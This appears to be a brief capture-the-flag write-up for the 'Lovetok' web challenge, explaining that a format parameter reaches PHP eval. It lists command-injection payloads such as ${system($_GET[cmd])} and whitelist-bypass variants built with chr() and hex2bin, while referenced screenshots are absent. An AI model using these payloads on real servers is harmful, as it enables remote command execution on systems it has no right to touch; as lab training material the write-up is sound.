Lovetok

The website:

We can see that the back-end gives time when we give a certian value to the format parameter:

We also have the code:

we can see that the input we give 'r' is directly going into the eval function:

So we need to inject code here somehow -> but how?

we can try different code payloads like:

  1. ${system($_GET[cmd])}&cmd=ls

  2. ${print(`ls`)}

  3. to bypass the whitelist:

    1. ${system(chr(105).chr(100))}
    2. ${system(hex2bin(6964))}

  4. to bypass restriction for slashes read

and we get the flag:

PreviousWebNextTrapped source

Last updated